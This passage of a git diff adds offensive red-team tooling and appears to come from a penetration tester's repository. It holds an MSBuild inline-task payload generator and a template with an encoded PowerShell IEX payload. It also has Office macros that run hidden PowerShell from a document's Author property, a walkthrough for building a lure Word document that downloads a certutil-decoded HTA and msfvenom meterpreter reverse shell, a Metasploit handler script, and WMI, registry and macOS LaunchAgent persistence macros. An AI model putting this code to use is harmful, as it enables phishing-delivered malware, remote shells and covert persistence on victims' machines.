string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>''').safe_substitute(
templateName = templateName,
payload2 = base64.b64encode(payload)
)
exeLaunchCode = string.Template('''<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.Reflection" />
<Code Type="Fragment" Language="cs">
<![CDATA[
string payload = "$payload2";
byte[] decoded = System.Convert.FromBase64String(payload);
Assembly asm = Assembly.Load(decoded);
MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null);
]]>
</Code>''').safe_substitute(
payload2 = base64.b64encode(payload)
)
launchCode = exeLaunchCode if exeFile else powershellLaunchCode
template = string.Template('''<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildPowershellXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<Target Name="$taskName">
<$templateName />
</Target>
<UsingTask TaskName="$templateName" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
$launchCode
</Task>
</UsingTask>
</Project>''').safe_substitute(
taskName = taskName,
templateName = templateName,
launchCode = launchCode
)
return template
def detectFileIsExe(filePath, forced = False):
first1000 = []
with open(filePath, 'rb') as f:
first1000 = f.read()[:1000]
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
return False
dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
#if not dosStub in printables:
# return False
try:
pe = pefile.PE(filePath)
cli = pe.OPTIONAL_HEADER.DATA_DIRECTORY[14]
if not (cli.VirtualAddress != 0 and cli.Size != 0):
sys.stderr.write('[!] Specified input file is not a .NET Assembly / CLR executable file!\n')
if forced:
sys.exit(-1)
raise Exception()
else:
sys.stderr.write('[+] Specified EXE file seems to be .NET Assembly / CLR compatible.\n')
return True
except:
pass
return False
def minimize(output):
output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
output = output.replace('\n', '')
output = re.sub(r'\s{2,}', ' ', output)
output = re.sub(r'\s+([^\w])\s+', r'\1', output)
output = re.sub(r'([^\w"])\s+', r'\1', output)
variables = {
'payload' : 'x',
'method' : 'm',
'asm' : 'a',
'instance' : 'o',
'pipeline' : 'p',
'runspace' : 'r',
'decoded' : 'd'
}
for k, v in variables.items():
output = output.replace(k, v)
return output
def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script or PE/EXE file.')
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE (optional, if not used - the script will try to sense that). WARNING: Launching EXE is possibly ONLY WITH MONO/.NET IL/Assembly EXE file, not an ordinary native PE/EXE!')
args = parser.parse_args()
return args
def main(argv):
sys.stderr.write('''
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
''')
if len(argv) < 2:
print('Usage: ./generateMSBuildPowershellXML.py <inputFile>')
sys.exit(-1)
args = opts(argv)
isItExeFile = args.exe or detectFileIsExe(args.inputFile, args.exe)
if isItExeFile:
sys.stderr.write('[?] File recognized as PE/EXE.\n\n')
with open(args.inputFile, 'rb') as f:
payload = f.read()
else:
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
if args.inputFile.endswith('.exe'):
return False
payload = getCompressedPayload(args.inputFile)
output = getInlineTask(payload, isItExeFile)
if args.minimize:
output = minimize(output)
if args.encode:
print(base64.b64encode(output))
else:
print(output)
if __name__ == '__main__':
main(sys.argv)

12
red-teaming/macro-psh-stdin-author.vbs Normal file
View File

@ -0,0 +1,12 @@
Private Sub Workbook_Open()
Dim author As String
author = ActiveWorkbook.BuiltinDocumentProperties("Author")
Dim ws As Object
Set ws = CreateObject("WScript.Shell")
With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
.Terminate
End With
End Sub

89
red-teaming/msbuild-powershell-msgbox.xml Normal file
View File

@ -0,0 +1,89 @@
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Original Author: Pierre-Alexandre Braeken, Twitter: @pabraeken -->
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
<!-- Modified by Mariusz B. / mgeeky. -->
<Target Name="MyLittleInlineTaskName">
<MyLittleInlineTask />
</Target>
<UsingTask
TaskName="MyLittleInlineTask"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class MyLittleInlineTask : Task, ITask {
public override bool Execute() {
// Is your payload a raw EXE file?
bool rawExeFile = false;
if(!rawExeFile) {
/*
* Specifies whether Powershell payload is Base64 encoded.
*/
bool payloadBase64Encoded = false;
/*
* Here insert your plain multi-line Powershell snippet
*/
string payload = @"
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
";
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
if (!payloadBase64Encoded) {
pipeline.Commands.AddScript(payload);
}
else {
string payload2 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(payload));
pipeline.Commands.AddScript(payload2);
}
pipeline.Invoke();
runspace.Close();
}
else {
/*
* Here must be placed Base64 encoded raw EXE / PE file.
*/
string payload = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAA [...]";
byte[] decoded = System.Convert.FromBase64String(payload);
Assembly asm = Assembly.Load(decoded);
MethodInfo method = asm.EntryPoint;
object ob = asm.CreateInstance(method.Name);
method.Invoke(ob, null);
}
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>

218
red-teaming/muti-stage-1.md Normal file
View File

@ -0,0 +1,218 @@
# Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process
The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.
The resulted document will be:
- using OLE event autorun method
- removing it's pretext shapes
- Obtaining commands to be executed from document's _Author_ property and passing them to `StdIn` of _Powershell.exe_ process
- Leveraging `certutil` technique to receive Base64 encoded malicious HTA document
- Having Base64 encoded Powershell command in that _Author_ property
- Having fully Obfuscated VBA macro
---
1. Create an empty Word document with extension `.doc`
---
2. Create an OLE object named `Microsoft InkPicture Control` (_Developer tab -> Insert -> More controls -> ... _)
---
3. Double click on that OLE object and add the following method:
```
Public Once As Integer
Public Sub Launch()
On Error Resume Next
'
' Here will be malicious code placed
'
End Sub
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
If Once < 1 Then
Launch
End If
Once = Once + 1
End Sub
```
Since the `Painted` event will be triggered several times, we want to avoid situation of having several stagers popped on the target machine.
---
4. Then, add pretext shape enticing victim to enable editing/macros - having that, insert a function that will delete this shape after victim really enable macros.
For example of such shape - you can refer to one of my [repos](https://github.com/mgeeky/RobustPentestMacro).
**NOTICE**: Make sure to put the OLE Control in the topmost left corner of the document and to color that control (right click -> Propertied -> Color) so it will overlap visually with Pretext-shape.
The trick is to make the victim move the mouse over that OLE control after enabling macros (making it trigger `Painted` event in the background).
The function that will delete this and OLE object shapes after enabling macros is placed below:
```
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", True
DeleteWarningShape "Control 2", True
...
End Sub
Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
Dim shape As Word.shape
On Error Resume Next
For Each shape In ActiveDocument.Shapes
If StrComp(shape.Name, textBoxName) = 0 Then
shape.Delete
Exit For
End If
Next
If saveDocAfter Then
ActiveDocument.Save
End If
End Sub
```
---
5. Now, add code obtaining malicious _Powershell_ commands from _Author_ document's property and passing it to the _Powershell's_ `StdIn` stream:
```
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", True
DeleteWarningShape "Control 2", True
Dim authorProperty As String
authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
.StdIn.WriteLine authorProperty
.StdIn.WriteBlankLine 1
.Terminate
End With
```
Of course, having that - you will have to remember to add proper Powershell command to be executed right into _Author_ property of the Word file.
---
6. Now, we have to insert some code into that _Author_ property. This code should do the following:
- Download Base64 encoded `encoded.crt` file containing malicious HTA code.
- Use `certutil -decode encoded.crt out.hta` command that will strip that Base64 layer.
- Make entire powershell code that shall be placed in _Author_ property Unicode-Base64 encoded in such a way, that Powershell's `-EncodedCommand` will be able to process.
The following code can be use as an example:
```
powershell -ep bypass -Command "(new-object Net.WebClient).DownloadFile('http://192.168.56.101/encoded.crt','%TEMP%\encoded.crt');certutil -decode %TEMP%\encoded.crt %TEMP%\encoded.hta;start %TEMP%\encoded.hta"
```
Here, the file will be obtained from `http://192.168.56.101/encoded.crt` - of course, one will want to move that file into HTTPS webserver having some luring domain name.
This command can be then converted into Powershell-supported Base64 payload like so:
```
C:\Users\IEUser\Desktop\files\dl>powershell -ep bypass -command "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(\"(new-object Net.WebClient).DownloadFile('http://192.168.56.101/encoded.crt','%TEMP%\encoded.crt');certutil -decode %TEMP%\encoded.crt %TEMP%\encoded.hta;start %TEMP%\encoded.hta\"))"
KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADEAMAAxAC8AZQBuAGMAbwBkAGUAZAAuAGMAcgB0ACcALAAnAEMAOgBcAFUAcwBlAHIAcwBcAEkARQBVAHMAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABlAG4AYwBvAGQAZQBkAC4AYwByAHQAJwApADsAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAEkARQBVAHMAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABlAG4AYwBvAGQAZQBkAC4AYwByAHQAIABDADoAXABVAHMAZQByAHMAXABJAEUAVQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAZQBuAGMAbwBkAGUAZAAuAGgAdABhADsAcwB0AGEAcgB0ACAAQwA6AFwAVQBzAGUAcgBzAFwASQBFAFUAcwBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGUAbgBjAG8AZABlAGQALgBoAHQAYQA=
```
Now this code is to be placed into _Author_ property.
---
7. Now, in order to generate that `encoded.crt` file - go for the following steps:
- Step 1: Using `msfvenom` generate malicious HTA file
- Step 2: Convert that payload into Base64-encoded certificate file.
In order to automate above steps - you can use the below script:
```
#!/bin/bash
# --- PAYLOAD SETUP
LHOST=192.168.56.101
LPORT=4444
PAYLOAD=windows/meterpreter/reverse_tcp
# This file must have *.crt extension
OUTPUT_FILE=/var/www/html/encoded.crt
PAYLOAD_FILE=/tmp/test$RANDOM
# ----
msfvenom -f hta-psh -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -o $PAYLOAD_FILE
echo -----BEGIN CERTIFICATE----- > $OUTPUT_FILE
cat $PAYLOAD_FILE | base64 -w 0 >> $OUTPUT_FILE
echo -----END CERTIFICATE----- >> $OUTPUT_FILE
chown www-data:www-data $OUTPUT_FILE 2> /dev/null
echo "Generated file: $OUTPUT_FILE"
```
And Voila! You will have your `encoded.crt` file in webroot.
---
8. After that you can add some persistence methods and further fail-proof the Macro code. For a nice example of persistence method - the `WMIPersistence` method can be used:
[WMIPersistence](https://gist.github.com/mgeeky/d00ba855d2af73fd8d7446df0f64c25a)
---
9. After that, you will want to make the entire VBA macro code become obfuscated to further slow down analysis process.
The obfuscation can easily be pulled off using my [VisualBasicObfuscator](https://github.com/mgeeky/VisualBasicObfuscator)
---
## ENTIRE MACRO CAN LOOK LIKE THIS:
(without persistence method)
```
Public Once As Integer
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", False
DeleteWarningShape "Control 2", False
Dim authorProperty As String
authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
.StdIn.WriteLine authorProperty
.StdIn.WriteBlankLine 1
.Terminate
End With
End Sub
Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
Dim shape As Word.shape
On Error Resume Next
For Each shape In ActiveDocument.Shapes
If StrComp(shape.Name, textBoxName) = 0 Then
shape.Delete
Exit For
End If
Next
If saveDocAfter Then
ActiveDocument.Save
End If
End Sub
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
If Once < 1 Then
Launch
End If
Once = Once + 1
End Sub
```

19
red-teaming/set-handler.rc Normal file
View File

@ -0,0 +1,19 @@
use exploit/multi/handler
setg PAYLOAD windows/x64/meterpreter/reverse_https
setg LHOST <ATTACKER-IP>
setg LPORT 443
setg VERBOSE true
setg ExitOnSession false
setg Powershell::sub_funcs true
setg Powershell::sub_vars true
setg EnableStageEncoding true
setg StagerRetryCount 30
setg StagerRetryWait 10
exploit -j
use exploit/multi/script/web_delivery
set TARGET 2
set SRVPORT 8080
set SSL true
set URIPATH msf
set DisablePayloadHandler true
exploit -j

81
red-teaming/vba-macro-mac-persistence.vbs Normal file
View File

@ -0,0 +1,81 @@
#If VBA7 Then
' 64-bit Mac (2016)
Private Declare PtrSafe Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare PtrSafe Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As LongPtr
Private Declare PtrSafe Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As LongPtr) As Long
Private Declare PtrSafe Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As LongPtr) As Long
#Else
' 32-bit Mac
Private Declare Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As Long
Private Declare Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As Long) As Long
Private Declare Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As Long) As Long
#End If
Sub writeToFile(ByVal file As String, ByVal txt As String)
#If Mac Then
#If VBA7 Then
Dim fp As LongPtr
#Else
Dim fp As Long
#End If
Dim grants
grants = Array(file)
GrantAccessToMultipleFiles(grants)
' BUG: fopen will return 0 here.
fp = fopen(file, "w")
If fp = 0 Then: Exit Sub
fputs txt, fp
fclose(fp)
#End If
End Sub
Sub MacPersistence(ByVal cmd As String, ByVal taskName As String)
Dim plist As String
plist = "<?xml version=""1.0"" encoding=""UTF-8""?>\n"
plist = plist & "<!DOCTYPE plist PUBLIC ""-//Apple Computer//DTD "
plist = plist & "PLIST 1.0//EN"" ""http://www.apple.com/DTDs/plist"
plist = plist & " = plist & PropertyList-1.0.dtd"">\n"
plist = plist & "<plist version=""1.0"">\n
plist = plist & "<dict>\n"
plist = plist & " <key>Label</key>\n"
plist = plist & " <string>" & taskName & "</string>\n"
plist = plist & " <key>ProgramArguments</key>\n"
plist = plist & " <array>\n"
plist = plist & " <string>/bin/bash</string>\n"
plist = plist & " <string>-c</string>\n"
plist = plist & " <string>'" & cmd & "'</string>\n"
plist = plist & " </array>\n"
plist = plist & " <key>RunAtLoad</key>\n"
plist = plist & " <true/>\n"
plist = plist & " <key>KeepAlive</key>\n"
plist = plist & " <true/>\n"
plist = plist & "</dict>\n"
plist = plist & "</plist>\n"
' TODO: File writing does not work at the moment, most likely due to
' apps sandboxing mechanism enforced by the system.
' Approach #1: File write by system command
' system("echo -e """ & plist & """ > ~/Library/LaunchAgents/" & taskName)
' Approach #2: File write by fopen+fputs+fclose
Dim fileName As String
fileName = "~/Library/LaunchAgents/" & taskName & ".plist"
writeToFile fileName, plist
End Sub
Sub TestMacPersistence()
MacPersistence "/Applications/Calculator.app/Contents/MacOS/Calculator", "com.java.update"
End Sub

105
red-teaming/vba-windows-persistence.vbs Normal file
View File

@ -0,0 +1,105 @@
'
' SYNOPSIS:
' This macro implements two windows persistence methods:
' - WMI Event Filter object creation
' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64
'
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
' USAGE:
' WindowsPersistence("command to be launched", "taskName")
'
' EXAMPLE:
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
Dim filterName, consumerName As String
Dim objLocator, objService1
Dim objInstances1, objInstances2, objInstances3
Dim newObj1, newObj2, newObj3
On Error GoTo Failed
filterName = taskName & "Event"
consumerName = taskName & "Consumer"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService1 = objLocator.ConnectServer(".", "root\subscription")
'
' Step 1: Set WMI Instance of type Event Filter
'
Set objInstances1 = objService1.Get("__EventFilter")
' The malware originally will kicks in after roughly 3 minutes since System gets up.
' One can modify this delay time by modifying the WHERE clausule of the below query.
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
& "AND TargetInstance.SystemUpTime >= 200 AND " _
& "TargetInstance.SystemUpTime < 320"
' New object of type __EventFilter
Set newObj1 = objInstances1.Spawninstance_
newObj1.Name = filterName
newObj1.eventNamespace = "root\cimv2"
newObj1.QueryLanguage = "WQL"
newObj1.Query = Query
newObj1.Put_
'
' Step 2: Set WMI instance of type: CommandLineEventConsumer
'
Set objInstances2 = objService1.Get("CommandLineEventConsumer")
Set newObj2 = objInstances2.Spawninstance_
newObj2.Name = consumerName
newObj2.CommandLineTemplate = exePath
newObj2.Put_
'
' Step 3: Set WMI instance of type: Filter To Consumer Binding
'
Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
Set newObj3 = objInstances3.Spawninstance_
newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
newObj3.Put_
WMIPersistence = True
Exit Function
Failed:
WMIPersistence = False
End Function
Public Function RegistryPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
On Error GoTo Failed
Const HKEY_CURRENT_USER = &H80000001
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strComputer = "."
Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strValueName = taskName
strValue = exePath
objReg.SetExpandedStringValue HKEY_CURRENT_USER, strKeyPath, strValueName, strValue
RegistryPersistence = True
Exit Function
Failed:
RegistryPersistence = False
End Function
Public Function WindowsPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
If WMIPersistence(exePath, taskName) <> True Then
RegistryPersistence exePath, taskName
End If
End Function

BIN
red-teaming/warnings/EN-Excel.docx Normal file
View File

Binary file not shown.

BIN
red-teaming/warnings/EN-Word.docx Normal file
View File

Binary file not shown.